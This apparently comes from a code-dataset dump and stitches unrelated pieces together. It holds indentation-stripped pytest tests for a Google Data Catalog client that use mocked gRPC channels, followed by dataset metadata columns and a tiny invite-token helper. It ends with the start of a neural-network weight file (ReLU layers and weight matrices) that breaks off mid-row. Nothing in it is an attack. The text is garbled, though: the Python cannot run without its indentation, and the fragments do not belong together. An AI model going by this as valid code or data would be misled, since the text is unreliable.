expected_response = tags_pb2.TagTemplateField(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
tag_template_field_id = "tagTemplateFieldId-92144832"
tag_template_field = {}
response = client.create_tag_template_field(
parent, tag_template_field_id, tag_template_field
)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateTagTemplateFieldRequest(
parent=parent,
tag_template_field_id=tag_template_field_id,
tag_template_field=tag_template_field,
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_tag_template_field_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
tag_template_field_id = "tagTemplateFieldId-92144832"
tag_template_field = {}
with pytest.raises(CustomException):
client.create_tag_template_field(
parent, tag_template_field_id, tag_template_field
)
def test_update_tag_template_field(self):
# Setup Expected Response
name_2 = "name2-1052831874"
display_name = "displayName1615086568"
is_required = True
expected_response = {
"name": name_2,
"display_name": display_name,
"is_required": is_required,
}
expected_response = tags_pb2.TagTemplateField(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
tag_template_field = {}
response = client.update_tag_template_field(name, tag_template_field)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.UpdateTagTemplateFieldRequest(
name=name, tag_template_field=tag_template_field
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_tag_template_field_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
tag_template_field = {}
with pytest.raises(CustomException):
client.update_tag_template_field(name, tag_template_field)
def test_rename_tag_template_field(self):
# Setup Expected Response
name_2 = "name2-1052831874"
display_name = "displayName1615086568"
is_required = True
expected_response = {
"name": name_2,
"display_name": display_name,
"is_required": is_required,
}
expected_response = tags_pb2.TagTemplateField(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
new_tag_template_field_id = "newTagTemplateFieldId-1668354591"
response = client.rename_tag_template_field(name, new_tag_template_field_id)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.RenameTagTemplateFieldRequest(
name=name, new_tag_template_field_id=new_tag_template_field_id
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_rename_tag_template_field_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
new_tag_template_field_id = "newTagTemplateFieldId-1668354591"
with pytest.raises(CustomException):
client.rename_tag_template_field(name, new_tag_template_field_id)
def test_delete_tag_template_field(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
force = False
client.delete_tag_template_field(name, force)
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.DeleteTagTemplateFieldRequest(
name=name, force=force
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_tag_template_field_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
force = False
with pytest.raises(CustomException):
client.delete_tag_template_field(name, force)
def test_create_tag(self):
# Setup Expected Response
name = "name3373707"
template = "template-1321546630"
template_display_name = "templateDisplayName-532252787"
column = "column-1354837162"
expected_response = {
"name": name,
"template": template,
"template_display_name": template_display_name,
"column": column,
}
expected_response = tags_pb2.Tag(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.entry_path(
"[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]"
)
tag = {}
response = client.create_tag(parent, tag)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateTagRequest(parent=parent, tag=tag)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_tag_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.entry_path(
"[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]"
)
tag = {}
with pytest.raises(CustomException):
client.create_tag(parent, tag)
def test_update_tag(self):
# Setup Expected Response
name = "name3373707"
template = "template-1321546630"
template_display_name = "templateDisplayName-532252787"
column = "column-1354837162"
expected_response = {
"name": name,
"template": template,
"template_display_name": template_display_name,
"column": column,
}
expected_response = tags_pb2.Tag(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
tag = {}
response = client.update_tag(tag)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.UpdateTagRequest(tag=tag)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_tag_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
tag = {}
with pytest.raises(CustomException):
client.update_tag(tag)
def test_delete_tag(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.tag_path(
"[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]", "[TAG]"
)
client.delete_tag(name)
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.DeleteTagRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_tag_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.tag_path(
"[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]", "[TAG]"
)
with pytest.raises(CustomException):
client.delete_tag(name)
def test_list_tags(self):
# Setup Expected Response
next_page_token = ""
tags_element = {}
tags = [tags_element]
expected_response = {"next_page_token": next_page_token, "tags": tags}
expected_response = datacatalog_pb2.ListTagsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.entry_path(
"[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]"
)
paged_list_response = client.list_tags(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.tags[0] == resources[0]
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.ListTagsRequest(parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_tags_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.entry_path(
"[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]"
)
paged_list_response = client.list_tags(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_set_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b"21"
expected_response = {"version": version, "etag": etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
policy = {}
response = client.set_iam_policy(resource, policy)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.SetIamPolicyRequest(
resource=resource, policy=policy
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_set_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
policy = {}
with pytest.raises(CustomException):
client.set_iam_policy(resource, policy)
def test_get_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b"21"
expected_response = {"version": version, "etag": etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
response = client.get_iam_policy(resource)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.GetIamPolicyRequest(resource=resource)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
with pytest.raises(CustomException):
client.get_iam_policy(resource)
def test_test_iam_permissions(self):
# Setup Expected Response
expected_response = {}
expected_response = iam_policy_pb2.TestIamPermissionsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
permissions = []
response = client.test_iam_permissions(resource, permissions)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.TestIamPermissionsRequest(
resource=resource, permissions=permissions
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_test_iam_permissions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
permissions = []
with pytest.raises(CustomException):
client.test_iam_permissions(resource, permissions)
| 38.20434
| 88
| 0.661097
| 4,309
| 42,254
| 6.213275
| 0.05268
| 0.069921
| 0.0251
| 0.035857
| 0.904979
| 0.884398
| 0.866395
| 0.850558
| 0.837784
| 0.827214
| 0
| 0.024618
| 0.250154
| 42,254
| 1,105
| 89
| 38.238914
| 0.820383
| 0.063308
| 0
| 0.749035
| 0
| 0
| 0.124864
| 0.072307
| 0
| 0
| 0
| 0
| 0.088803
| 1
| 0.066924
| false
| 0.001287
| 0.011583
| 0.001287
| 0.086229
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d4183d7b1c598f4e319b91804f7be9aaad2bb6f
| 82
|
py
|
Python
|
bartender/users/generators.py
|
autiwg/bartender
|
1c26aefb777a01ce527745c543e60b11a972fe5d
|
[
"Unlicense",
"MIT"
] | null | null | null |
bartender/users/generators.py
|
autiwg/bartender
|
1c26aefb777a01ce527745c543e60b11a972fe5d
|
[
"Unlicense",
"MIT"
] | null | null | null |
bartender/users/generators.py
|
autiwg/bartender
|
1c26aefb777a01ce527745c543e60b11a972fe5d
|
[
"Unlicense",
"MIT"
] | null | null | null |
from uuid import uuid4
def generate_invite_token():
return str(uuid4())[:8]
| 13.666667
| 28
| 0.707317
| 12
| 82
| 4.666667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044118
| 0.170732
| 82
| 5
| 29
| 16.4
| 0.779412
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
1818ad0cd13da3bed84ee16fab3591b140c22d80
| 383,655
|
pyt
|
Python
|
eran/NNet/nnet/ACASXU_run2a_1_1_batch_2000_16bit.pyt
|
pauls658/ReluDiff-ICSE2020-Artifact
|
212854fe04f482183c239e5dfec70106a9a83df8
|
[
"Apache-2.0"
] | 7
|
2020-01-27T21:25:49.000Z
|
2022-01-07T04:37:37.000Z
|
eran/NNet/nnet/ACASXU_run2a_1_1_batch_2000_16bit.pyt
|
yqtianust/ReluDiff-ICSE2020-Artifact
|
149f6efe4799602db749faa576980c36921a07c7
|
[
"Apache-2.0"
] | 1
|
2022-01-25T17:41:54.000Z
|
2022-01-26T02:27:51.000Z
|
eran/NNet/nnet/ACASXU_run2a_1_1_batch_2000_16bit.pyt
|
yqtianust/ReluDiff-ICSE2020-Artifact
|
149f6efe4799602db749faa576980c36921a07c7
|
[
"Apache-2.0"
] | 3
|
2020-03-14T17:12:17.000Z
|
2022-03-16T09:50:46.000Z
|
ReLU
[[0.0540062, -2.61092, -0.180027, 0.242194, 0.141407], [-1.12374, 0.0263619, -0.00917929, 0.055623, -0.327635], [0.196019, 0.242159, 0.638452, -0.478265, 0.142577], [-1.63015, -0.0344447, -0.00605492, 0.0112076, -0.0104997], [-0.355133, 0.565969, 0.228267, 0.177342, -0.208078], [-0.0341918, 1.4957, -1.53371, 0.0405053, 0.16435], [0.402002, 0.224022, -0.046716, 0.16389, -0.160826], [-1.41575, -0.0747429, 0.0604386, 0.0482656, -0.0560096], [-1.44498, 0.0448403, 0.00888916, -0.25023, 0.0653312], [-1.1274, 0.0239891, -0.00956711, 0.00892796, -0.00458007], [0.613717, -0.55782, -0.0519507, 0.160852, -0.0971775], [0.933699, 0.203647, 0.166178, -0.00152163, -0.209448], [-0.0408026, 0.548666, 0.0574868, 0.142985, 0.0948681], [-0.212265, -0.328003, 0.357536, -0.389715, -0.459337], [0.032018, 0.422455, -0.568833, -0.210782, 0.0757506], [-0.0124055, 2.28453, 0.0534617, 0.0580561, 0.118652], [-0.12243, -0.712042, 0.00915904, -0.391123, 0.0339849], [0.0601742, -0.0639072, -2.50281, 0.0499702, -0.0377898], [0.0833034, -0.0407486, -0.752101, -0.118798, -0.218044], [-1.18804, 0.14463, -0.14928, -0.0360766, -0.118933], [-0.103537, 0.0699915, 2.42373, 0.0226499, 0.0319605], [-0.0853903, 0.175215, -0.0874009, -0.731836, -0.22085], [-0.0193838, 3.9939, 0.117807, 0.0784146, -0.0145183], [0.0166866, -0.654405, 0.560096, 0.196579, -0.449805], [0.00167639, 0.00538434, -0.00726639, 0.00418084, 0.00178105], [-0.897525, -0.127606, 0.162803, -0.0481184, 0.0785461], [-0.93322, -0.0243277, 0.230273, -0.209033, -0.0943662], [0.160333, 0.00369291, 0.262149, 0.281943, -0.551476], [0.0834021, 2.01281, 0.35531, 0.0360065, -0.0996482], [0.284019, -0.0465741, 0.0074793, -0.840513, -0.481789], [1.37295, 0.0058815, 0.0130908, -0.0741005, -0.155849], [-0.144445, 0.000607591, -0.0211642, -0.647714, -0.0182691], [-1.3629, -0.0207197, 0.0445642, 0.0394107, 0.0935691], [-1.55178, 0.0838021, -0.0352086, 0.00605953, 0.00828404], [1.29659, 0.0938274, 0.175474, 0.13344, 0.298777], [0.015868, 0.329773, -0.265353, -0.103541, 0.0765932], [-0.0415857, -1.47674, -0.0579324, -0.206667, 0.201547], [-0.0826992, 0.0025512, 0.00987215, 0.0689708, -0.878938], [-1.59025, 0.047571, 0.00763074, -0.0142601, 0.00285048], [0.0283388, -0.0230824, -0.0763311, -0.77161, 0.499034], [0.139212, -0.572182, 0.426805, -0.330029, 0.280864], [0.257852, -0.0626802, -0.331132, 0.329905, -0.856315], [0.068648, 0.00245863, -0.014261, 0.0279897, -1.85103], [-0.74459, 0.00311863, -0.187879, 0.0136177, -0.015955], [-0.416569, 0.0120669, -0.0481611, -0.364603, 0.288194], [-0.632539, -0.0358635, 0.0283509, 0.0737678, 0.0649997], [0.0392007, 0.564469, 0.262818, -0.0139606, -0.357883], [-0.0385883, -0.123878, -0.762627, 0.0423037, 0.0498901], [-1.57631, 0.000440016, -0.00832176, -0.0926607, -0.00493705], [0.620367, 0.0750374, -0.0146141, 0.262575, -0.257948], [0.05402, -2.611, -0.18, 0.2422, 0.1414], [-1.124, 0.02637, -0.00918, 0.05563, -0.3276], [0.196, 0.2422, 0.6387, -0.4783, 0.1426], [-1.63, -0.03445, -0.006054, 0.01121, -0.0105], [-0.3552, 0.566, 0.2283, 0.1774, -0.2081], [-0.03418, 1.496, -1.534, 0.0405, 0.1643], [0.402, 0.224, -0.04672, 0.164, -0.1608], [-1.416, -0.07477, 0.06042, 0.04828, -0.056], [-1.445, 0.04483, 0.00889, -0.2502, 0.0653], [-1.127, 0.02399, -0.00957, 0.00893, -0.00458], [0.614, -0.5576, -0.05194, 0.1609, -0.09717], [0.9336, 0.2036, 0.1661, -0.001522, -0.2095], [-0.0408, 0.549, 0.0575, 0.143, 0.09485], [-0.2123, -0.3281, 0.3574, -0.3896, -0.4592], [0.032, 0.4224, -0.569, -0.2108, 0.07574], [-0.012405, 2.285, 0.05347, 0.05804, 0.11865], [-0.12244, -0.712, 0.009155, -0.391, 0.034], [0.06018, -0.0639, -2.502, 0.04996, -0.03778], [0.0833, -0.04074, -0.752, -0.1188, -0.218], [-1.188, 0.1447, -0.1493, -0.03607, -0.11896], [-0.1035, 0.07, 2.424, 0.02264, 0.03195], [-0.0854, 0.1752, -0.0874, -0.732, -0.2208], [-0.01938, 3.994, 0.1178, 0.0784, -0.01452], [0.0167, -0.6543, 0.56, 0.1965, -0.4497], [0.001677, 0.005383, -0.007267, 0.00418, 0.001781], [-0.8975, -0.1276, 0.1628, -0.04813, 0.07855], [-0.933, -0.02432, 0.2302, -0.209, -0.09436], [0.1603, 0.003693, 0.2622, 0.282, -0.5513], [0.0834, 2.014, 0.3552, 0.036, -0.0997], [0.284, -0.04657, 0.00748, -0.8403, -0.4817], [1.373, 0.005882, 0.01309, -0.0741, -0.1559], [-0.1444, 0.0006075, -0.02116, -0.648, -0.01826], [-1.363, -0.02072, 0.04456, 0.0394, 0.09357], [-1.552, 0.0838, -0.03522, 0.006058, 0.008286], [1.297, 0.0938, 0.1754, 0.1334, 0.2988], [0.01587, 0.3298, -0.2654, -0.1035, 0.0766], [-0.0416, -1.477, -0.05792, -0.2067, 0.2015], [-0.0827, 0.002552, 0.00987, 0.069, -0.879], [-1.59, 0.04758, 0.00763, -0.01426, 0.00285], [0.02834, -0.02309, -0.07635, -0.7715, 0.499], [0.1392, -0.5723, 0.4268, -0.33, 0.2808], [0.2578, -0.0627, -0.331, 0.3298, -0.8564], [0.06866, 0.002459, -0.01426, 0.02798, -1.851], [-0.7446, 0.003119, -0.1879, 0.01362, -0.01596], [-0.4165, 0.01207, -0.04816, -0.3645, 0.288], [-0.6323, -0.03586, 0.02835, 0.0738, 0.065], [0.0392, 0.5645, 0.263, -0.01396, -0.358], [-0.03857, -0.1239, -0.7627, 0.0423, 0.0499], [-1.576, 0.0004401, -0.00832, -0.09265, -0.004936], [0.6206, 0.075, -0.01461, 0.2627, -0.258]]
[0.22763, -0.188762, 0.0534094, -0.377861, -0.0812531, -0.588651, 0.0746065, -0.392887, -0.356303, -0.167712, 0.0587109, 0.183917, 0.131957, -0.308681, 0.196929, 0.206664, -0.311696, 0.0306576, -0.138822, -0.347434, -0.0045184, -0.390616, 0.0969635, 0.00983266, -0.0188585, -0.231919, -0.238165, 0.0710148, -0.141913, -0.442307, 0.559084, 0.135483, -0.373217, -0.41539, 0.759638, 0.132825, 0.235566, 0.214858, -0.440841, -0.0772968, 0.221606, -0.00650873, -0.634843, -0.153833, -0.0573027, -0.109229, 0.0370344, 0.0538087, -0.44755, 0.175917, 0.2277, -0.1887, 0.0534, -0.378, -0.08124, -0.589, 0.0746, -0.3928, -0.3562, -0.1677, 0.05872, 0.184, 0.132, -0.3086, 0.1969, 0.2067, -0.3118, 0.03065, -0.1388, -0.3474, -0.004517, -0.3906, 0.097, 0.009834, -0.01886, -0.2319, -0.2382, 0.07104, -0.142, -0.4424, 0.559, 0.1355, -0.3733, -0.4153, 0.76, 0.1328, 0.2356, 0.2148, -0.441, -0.0773, 0.2216, -0.006508, -0.635, -0.1538, -0.0573, -0.10925, 0.03705, 0.0538, -0.4475, 0.1759]
ReLU
[[-0.184202, 0.0343834, -0.115142, 0.184753, -0.137148, -0.189317, -0.748695, 0.575849, -0.0133157, 0.143641, 0.133067, -0.224418, 0.302148, 0.0408489, -0.339559, 0.064917, 0.0731692, -0.459231, 0.474744, 0.377226, -1.11407, -0.571853, 0.0499151, -0.254206, -0.025244, 0.225768, 0.149962, -0.155202, -0.0172013, 0.990686, 0.0783843, -0.144198, -0.179075, -0.340037, 0.212321, 0.00825806, 0.0684292, 0.587946, -0.170712, -0.54369, 0.118932, -0.495853, -1.66652, -0.324074, -0.0154229, 0.5101, 0.0940898, 0.337388, 0.395671, -0.223473, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0171639, -0.0344739, -0.00869311, 0.0381665, 0.021407, 0.0421881, 0.0215526, -0.033617, -0.0474388, 0.0213502, 0.00994309, 0.0277698, 0.00492707, -0.0427201, -0.0240032, -0.0322351, 0.0133943, -0.0423694, -0.0401146, -0.0174541, -0.0423118, 0.0146571, -0.0313675, 0.0384782, 0.0464228, 0.0218262, 0.0159546, 0.00417461, 0.0174008, -0.0178484, -0.0479125, -0.00408486, -0.041842, 0.0014546, -0.0508771, -0.046335, 0.0214261, -0.0532753, -0.0573137, 0.0289767, -0.032939, -0.031973, -0.0333988, -0.0227086, -0.0154722, -0.0484061, -0.0071155, -0.0371157, 0.0196442, -0.0351744, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0698282, -0.00408911, -0.277997, 0.25879, 0.15582, -1.33151, -1.31188, -0.893189, 0.195445, 0.384027, 0.0427115, -0.539398, 0.0812943, 0.401288, -0.274514, 0.367932, -0.760605, -1.29349, 1.4711, 0.0977806, -0.790099, -0.534664, 0.00720768, -0.553668, -0.0219908, 0.265326, 0.203953, 0.409155, -0.859508, 0.187561, 0.242437, -0.112824, 0.526523, -0.463904, -0.364338, 0.0536935, 0.443625, 0.919664, 0.639951, -0.878768, -0.978508, -0.0391997, 0.142149, -0.798507, -1.76701, 0.152952, 0.26103, -1.87652, -0.592208, 0.440622, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.794837, -0.36298, -0.171911, 0.0975946, 0.0271402, -0.415327, -0.0924507, -0.602603, -0.320925, 0.43533, 0.52763, -0.415412, -0.195773, -0.0372765, -1.00783, 0.133426, 0.248356, -1.69865, 2.01099, -0.707126, 1.15497, 0.527052, -0.169422, 0.363558, -0.0301804, 0.770538, -0.377548, -0.0137244, -0.487739, 0.22633, 0.383543, 0.2819, -0.476764, 0.00903008, -0.101426, -0.620982, 0.00445635, -0.144175, -0.132467, 0.356608, 0.0580446, -0.455311, -0.707104, -0.405381, -0.0423059, 0.596877, -0.217635, -0.128899, -0.126611, -0.172846, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0585128, 0.00708394, 0.268116, -0.00659521, 0.315806, -0.053758, 0.365686, 0.0360562, -0.047443, -0.371296, 0.153974, -0.215701, 0.14624, 0.414588, -0.0522092, -0.122101, -0.238432, -1.09953, -3.20509, -0.438948, -0.260557, -0.269236, -0.0409149, 0.369151, -0.0435317, -0.344475, -0.370995, -0.368811, -0.0348575, 0.383794, -0.104012, -0.345975, 0.525536, 0.140227, 0.15607, 0.573022, -0.016426, -0.134221, -0.133525, 0.00989791, -0.21803, -0.156527, -0.639669, 0.667558, 0.414996, 0.324016, -0.0659676, 0.859081, -0.619551, -0.011175, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0332535, -0.081036, -0.53441, 0.667956, -0.81253, 1.29677, 1.2687, 0.704389, 0.11782, 0.0314183, 0.345893, -1.27676, 0.259326, 0.755813, 0.558989, -0.12361, -0.316966, -1.38929, -2.33073, 0.684739, 0.0419089, -0.641408, -0.0220248, -0.815136, 0.0362659, -0.332806, -0.174175, -0.664114, 0.215466, 0.414545, -0.316214, 0.41088, 0.656423, 1.71721, -0.35039, 0.074316, 0.374249, 0.239212, 1.45042, -0.321268, 0.245178, -0.717588, -1.7871, 1.14188, 0.282764, 0.794952, -0.299762, -0.773011, -0.0411885, 0.819762, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 